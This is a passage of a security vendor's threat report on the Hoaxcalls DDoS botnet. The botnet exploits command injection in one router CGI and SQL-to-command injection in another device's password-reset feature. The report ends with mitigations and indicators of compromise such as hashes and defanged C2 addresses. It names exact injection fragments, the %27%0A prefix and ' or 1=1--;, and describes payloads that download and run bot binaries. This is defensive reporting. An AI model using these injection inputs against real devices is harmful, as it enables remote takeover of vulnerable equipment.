The executable /www/cgi-bin/mainfunction.cgi doesn’t properly filter the keyPath parameter during authentication, resulting in exploitable command injection. The attacker can prepend the payload with special characters like %27%0A to bypass the check and achieve pre-authentication command execution. The vulnerability was observed to be exploited in the wild since December last year.

CVE-2020-5722

The system doesn’t properly validate the user_name parameter, resulting in SQL injection when the Forgot Password feature queries the backend SQLite database and invokes sendMail.py via popen(). The attacker can provide a default username such as admin followed by specific SQL strings and shell metacharacters ' or 1=1--;, effectively turning this vulnerability into a command execution. According to this advisory, this vulnerability can also be exploited through HTML injection. The first exploitation method is observed in current ongoing attacks.

Exploit in the Wild

Our Next-Generation Firewall caught the first incident of CVE-2020-8515 exploitation on March 31, 2020 at 13:51 (UTC). In addition to this attack, several bots’ attempt to propagate by exploiting CVE-2020-5722 were also caught by our firewall. In the case of CVE-2020-8515 exploitation, the threat actor attempted to download a shell script to the tmp directory, and execute the downloaded script, as shown in Figure 9. In the case of CVE-2020-5722 exploitation, the payload only downloads an arm7 binary and executes it, as shown in Figure 10.

Figure 1. CVE-2020-8155 exploit spotted in the wild
Figure 9. CVE-2020-8515 exploit spotted in the wild
Figure 10. CVE-2020-5722 exploit spotted in the wild

The following figure shows the content of the downloaded shell script sh. Upon execution, the sh script downloads different architectures of DDoS bot, and runs the downloaded binaries. None of the malwares was available on Virustotal at the time of our discovery, however many of them were uploaded to Virustotal not long after. More and more attack traffic are being detected at the time of writing, indicating that many devices are probably infected already.

hoaxcalls sample that downloads and launches the bots
Figure 11. Shell script that downloads and launches the bots

Conclusion and Mitigation

Hoaxcalls, a new DDOS botnet, is actively exploiting two vulnerabilities which have wide exposure in environments around the world. These same vulnerabilities are also actively being exploited in additional attacks, according to other security research organizations. Unfortunately, they are also easily exploited and lead to remote code execution; as such we advise everyone to patch as soon as possible. 

Palo Alto Networks customers are protected from the aforementioned vulnerabilities by the following products and services:

    • Next-Generation Firewalls with threat prevention license can block the attacks with best practice via threat prevention signature 57897 and 57892.
    • WildFire can stop the malware with static signature detections.
    • PAN-DB blocks malicious malware domains.

IoCs

File (Sha256)

Group1:

762ba1a2f7d62b8fc206ffb1bf39e89db651a1abb584402f9939d91a5b7899d3 arm4

ae447f9cad4f4909c576c577a94aa3d38be7b9636c9b7fb04a181caca42ea92b arm5

8777e47ab84fb681379b2253735aa1490d69e94201d57f06334c9ddfb1063637 arm6

695a0b2ef0d46027d2f106c060dade52b34e3bb7342a8eae906c7d2b15a99fc3 arm7

53aaee7d0de64b71ea0c61ec62b4fb509850f915b574b2560e98692057d32a1c i486

df5ba0630a0fe701afccc129be7e9612cb4016dcc70273b748dad66dc152b6e9 i586

e2dc3e0956a818fb22a77c50d9cfe91b7639c727db8a6838efd368ba277664b1 i686

f4cf6a033aac287ff0b5171ce6f64836691b822f76705b04445f52f643da8c10 m68k

72492605815c59579170adef1519231a5e3f17ada26428d20bd7948041c812a3 mips

9a62763da3dc8c1de87b50271a7b446e753016f72f5631e1c6eb17ff5425e7ab mips64

b7b94fac1067217914d99f2d98b34c310a6c53eb36d3a430eea5df8217c4d1f8 mpsl

41ef0133acaca395ea957e796dc1b939b9825b1414541c616b8ca8bdfadb8d16 ppc

c3ea39b0cc786dcda73821f60b42d84c9557e9e590d7f3b4a328eb7a6e6559f4 ppc440

19270639537a2241861eae2bbf4b4095fc6e1915e4dee476d2e4f277992733fd sh

82bb86e2041f4e37187ceb93bcbc48bd8311274ef33a166c6a8e0e9ffe33b585 sh4

b32dcd47377b781c17a6ae7c88d4e1a4294d539ba8f452d980b78a9611d1cb6f spc

aa69b3ac7b55fff5dde4491e4153954b31c36d528fdb390495b9bd7bc1a0c77b x86

Group2:

f31c7e7be06d8d6ec13337c76ca86b3692b3f5d7632e20b725d3542b3e316e62 arm4

e31d945930048f0c06a84942212e5a14b75cee7538fbf0c9c0e1759546c7f6b9 arm5

ded7ce9588d47885fc6a9a360e1d3561478d4be71d0971aaf76995621eb94db3 arm6

0820eba0c16325b9cd24c54d6655f6d9aeb2e28b4fc82d6da598b71139aceb5e arm7

df4e8168357559280db011eaf88088a8493b6e20df4ace06069b93c6d28af3ee i486

931b1e85e19b138a4a3bf3890749b8884a5ff4a6b34c1df3b9083d7f304e5694 i586

06d019d1266bb345fc85df991b419474026d3e21a8b8a1328bad77fbfeb8cb00 m68k

6be47cf2f418d9729cdb1eb03885ab14e07a5955e63b06062fec97b567f959de mips

3c66db7df3f84633dbe6ed7b84911d7202c53968b88861f2463a152c839e89bf mips64

8a77f9843174a53a5909554589177ce7e32d6a36a6c6ef868e4c118f98069641 mpsl

7a5d8752049afdc8060d6a27407dcddfd9d7642c14600f586767c67afe0ef64b ppc

c0df164ac0af7cca5cb02e66d181bc80ed9d58cec038b82ed170ebb75b78645f ppc440

72d6846b9e004662cd7f2d10fdc66d02ca9b5eb545582529a935f6ff5cd2a9e7 sh4

02eb5d0d8ddbd68ff459b3bb388484b841ac23cb9604b9a9e503f9dcf9c49186 spc

27fc18936f445fc0d2ede1d6fb301594d352d86268b4b1590dad535c7051c5ef x86

Group3:

f62819deb8fe2a96fa34137f6eb1d5e2e0a8e52594f9a51e78f4a2c13f5a7b96 arm4

c0a958ea24c585d1bc99b562835e95f7d2c4a57674085df668dbbf7baa2b9fe8 arm5

b6619dbeb420f4ee824115987c116540604356b115641d1f3c740846689b6a7b arm6

65100dbe19870b6be1b398c6185b25d3a502dfb2b5166ba0d1a938b607ea1880 arm7

527bd14dfec20820e84c64b0f0924ae1272d9d3920b38c998a131a21e53a5789 i486

a27c04ce5769953e860ed473641c1a562293d01b75230bbcb803d66df4512daf i586

3ffc07cb1c7c08a5b43e4acfefbab9cb45df88bc9bd8dc2bcb489d350e18c8a1 i686

59f71ff3d2df1f8c3f12e2844b78545de1fdfdabc1d80a7221ad75b24af986e2 m68k

9fe8885439dec03cc0056324b5e2910d363ea139e7167bc9257c2cf7a9e1ba33 mips

0a210410ef5f5cb85b2aa0e0530cb7763f354850f25cd9763b1154126f92c699 mips64

ef7b2e41bf4cbb4d99ca37f028ccae3f47a2b8e21b6fd46f15fe34d3bcf1395a mpsl

20d1e4ee888c2af8ee9b169f6c32290f3c378aa616519e374c7b15b6f7e4e3cf ppc

eb225d38828ae996463586554ddc2d30507e9e472667ae92a61ccb13c39a42f4 ppc440

73bbf4b38904cc17b5267064dda940a080965aa55a1a9d93dd36d21720ea91dc sh

388acd6a1a2ce446247f88b2370fda71092bbc28f7af3cbd759d6f97b9ab26fd sh4

5dbf6618d2d5e54d209f2befd4873c1c361893e822ca614cca9bad18aca75e01 spc

54df5531d1fdd8bb4f1d499ccbe055506a840860fcc08bf4d31bcc8a02296113 x86

Other samples making use of the same 2 exploits:

02eb5d0d8ddbd68ff459b3bb388484b841ac23cb9604b9a9e503f9dcf9c49186

06d019d1266bb345fc85df991b419474026d3e21a8b8a1328bad77fbfeb8cb00

07b71cd9093e22fd89e2e0ce9c4a67f93675bb227724b4f7542ab66c67097d45

0820eba0c16325b9cd24c54d6655f6d9aeb2e28b4fc82d6da598b71139aceb5e

0a1951d5488b70e5f9c504c8134adfff5cbd52c5bee87b41a69ba46c978751aa

0de057cd8075a7a95dc7ce18632c2a342d69fa26700c52ccc256dc0bf37198c7

0deb223ebb948619f0f6de334c2f7e0390547e0f905d54556c29605b3d6b8a26

19409cb3169c3bfad4e65a1c4d18df855c87eff63683bd2b93aa36dee746cef8

256db410dcc76f2ada308a20a6cfa489a26a5b7aac44ed122d12ac66c8070c7f

27fc18936f445fc0d2ede1d6fb301594d352d86268b4b1590dad535c7051c5ef

293d534fca05c2383849d50eb77a4e61c0b30b91f02dc9dd89fb7bf826eb83e5

2cac4daa388fbacc05ae0f99e9c146c18e70e89ab95b6ae649abddca9f801267

302af2e17c4ecdc468ab59b8f86d5b3adb824406685027d297f63bd7a7c80685

323fb07dfd54a485665468d97a94dcdbdb4c469c5a1a7af9e15f83a7d667f4ea

34322b2641c5dba9e044d3acd855da3943fc456dc9be05cc402f1ab730d97321

3a2138786d012af66ac49e4ae3de97efb852006ecdd356da40a5c98d1cfbd872

3b9d527d7e67465d78b14e4a628e68903de01127e7409afce61d4ca7ba0dfbbf

3c66db7df3f84633dbe6ed7b84911d7202c53968b88861f2463a152c839e89bf

3d96d12f434173e0c5691f26c980b1157dd84f77df98de61f2f214fbb34c0a84

41ef0133acaca395ea957e796dc1b939b9825b1414541c616b8ca8bdfadb8d16

41f98a985173d4f92f97f7b6d679b3078b0288caafcbf3033209b9e08aacd721

488821f7809673e380e50a8eec24db5bb00b4cfe9176ec85bdf8b17eca13ebcf

48a595e19720dcd6a57aa8647422a21a4680a3642e4bee8975a5f17da71b6994

49344ceb14a65041a09530d5d21498c0efb7c52acb8b0f06b6983922e4edfe41

50cff66f9e2a20f78d7e76c8db316c6e9bd09c019f80ac91c9e3016d26abfeb4

51138ebb4e773e822ceace1b571d4a72269ada92d6ddec8639ba1d558ffa7d35

523cfd05d0b10607bccf1a76bc9dc208a267be18dc274653a2300fb73d805e3b

53aaee7d0de64b71ea0c61ec62b4fb509850f915b574b2560e98692057d32a1c

5d9e24cdd842e6f8439c86b533c842ab41c4ddb6909301b52cda9430f7bb86a7

6330b698bca0fcfbf2883c597454dcec7ade3a5bf6d25f5770e4f37100e17bde

66e65a7273221bed3a7bd34d01ba87182e4940cf8d61ce6a440cfb4a88496855

695a0b2ef0d46027d2f106c060dade52b34e3bb7342a8eae906c7d2b15a99fc3

6be47cf2f418d9729cdb1eb03885ab14e07a5955e63b06062fec97b567f959de

72492605815c59579170adef1519231a5e3f17ada26428d20bd7948041c812a3

72d6846b9e004662cd7f2d10fdc66d02ca9b5eb545582529a935f6ff5cd2a9e7

762ba1a2f7d62b8fc206ffb1bf39e89db651a1abb584402f9939d91a5b7899d3

77d3d79c2c53b88b557f1aad6bae6f9d6ec92c1b1c043a95894620bbbbfce4be

79f59593d4a1a669bf8e2ef8749eb556303fbcaed032c67a52b03b696fe2f8de

7a5d8752049afdc8060d6a27407dcddfd9d7642c14600f586767c67afe0ef64b

7dc6eea0dd325291a06c7769b268fca01bb3d89f0e86ba4c4633bc17751a383f

822dd6afb32059b6235ad56f931457bf82b824c977f47abc446102fe7c0647b3

82bb86e2041f4e37187ceb93bcbc48bd8311274ef33a166c6a8e0e9ffe33b585

837cf1d050c89e28d0a847307641c2ad9ffc94d31f692dbdf496982e951e0fdf

84492d0457a2a1f57afd965c64c40ee63fcb3054754bdfae5046c0b940750582

8777e47ab84fb681379b2253735aa1490d69e94201d57f06334c9ddfb1063637

8a77f9843174a53a5909554589177ce7e32d6a36a6c6ef868e4c118f98069641

8f5543556ed0929a755b512d58fc97643d4f3685b7b01f6e18c291e35ceb54cf

931b1e85e19b138a4a3bf3890749b8884a5ff4a6b34c1df3b9083d7f304e5694

97694a5bf3585ef6d1a4cb8841872fedc557bd19ee159015a74bf964fa73dde0

97b13f8e073bf88557cf4263f5dabded8e9979e0f1aadae449241655ed0d8499

992b72da60cc4f1756b0a6342e5e71979f54ef6eba22c4faf7106e894ca062cd

9a62763da3dc8c1de87b50271a7b446e753016f72f5631e1c6eb17ff5425e7ab

9e4bf806a3f6986a981fd2fb8a14f99008fda1fd38738316d12d2a742096b6e9

aa69b3ac7b55fff5dde4491e4153954b31c36d528fdb390495b9bd7bc1a0c77b

ae447f9cad4f4909c576c577a94aa3d38be7b9636c9b7fb04a181caca42ea92b

ae692f3134e0fddbdf0cc41e176ede7d2a525fa8155b7b4724956ba2d51d7589

aef1d674b7b21e3210dba61028083a6537406922b87730b9494f3a3f75eb07a3

b32dcd47377b781c17a6ae7c88d4e1a4294d539ba8f452d980b78a9611d1cb6f

b3afdfdd65e8d21e5a6d35969c9d315ee6f937364adaabebb5913e642d6feede

b7b94fac1067217914d99f2d98b34c310a6c53eb36d3a430eea5df8217c4d1f8

b8fefd64070ae89ac7d6e9f1423bcf14785d7c5ff2d7417451264710f30b54cc

c0df164ac0af7cca5cb02e66d181bc80ed9d58cec038b82ed170ebb75b78645f

c3ea39b0cc786dcda73821f60b42d84c9557e9e590d7f3b4a328eb7a6e6559f4

cf0ec3f0ee8f7d538e3fa2d678d90fea26907ccf56a9dd77a7056d57b0c63bdb

d183596356b00d86bd6a3b647b170978e47d39a3e8cb33d6e30fbb8af111e314

d48b0c35cc931dd84664824a14b1675978b40bcaeee8aab2b06eaa0a7b41d8f3

ded7ce9588d47885fc6a9a360e1d3561478d4be71d0971aaf76995621eb94db3

df4e8168357559280db011eaf88088a8493b6e20df4ace06069b93c6d28af3ee

df5ba0630a0fe701afccc129be7e9612cb4016dcc70273b748dad66dc152b6e9

e07fe92781177ca0baf00bd456e9dabe6496ae86df1db2bd5ff5e2dcbbbee158

e11ca4bde56d2c7711a777421b445a53601516142dc949f97477f0c1458bff1e

e2dc3e0956a818fb22a77c50d9cfe91b7639c727db8a6838efd368ba277664b1

e31d945930048f0c06a84942212e5a14b75cee7538fbf0c9c0e1759546c7f6b9

e32106c161081bcea765017657215c5f97f837dc68aa51ff0f24ce9fefaac7e3

e54d1842519820f02ab8e1560f666f112d636de74c11729b41739dfb316fa3a5

e9bd90e5807af36bc2cca9769188a39050aa7ae6c193e67c588a73a555149f71

eab4b5a1f32cbd0840adb19e8f189019fbf9b20508883a15d3bdecd90bffad28

f21a9dc8f9c16a942e9c18729813bd3fb9f6e1408df68731160d7fe506f29bc6

f31c7e7be06d8d6ec13337c76ca86b3692b3f5d7632e20b725d3542b3e316e62

f4cf6a033aac287ff0b5171ce6f64836691b822f76705b04445f52f643da8c10

Network

178[.]32[.]148[.]5:1337 (Command and Control)

18[.]185[.]109[.]135:1337 (Command and Control)

192[.]3[.]45[.]185 (Malware Hosting Server)

164[.]132[.]92[.]180(Malware Hosting Server)

irc[.]hoaxcalls[.]pw (Malware Hosting Server)

 

Get the latest news, invites to events, and threat alerts

Default Heading

Read the article Right Arrow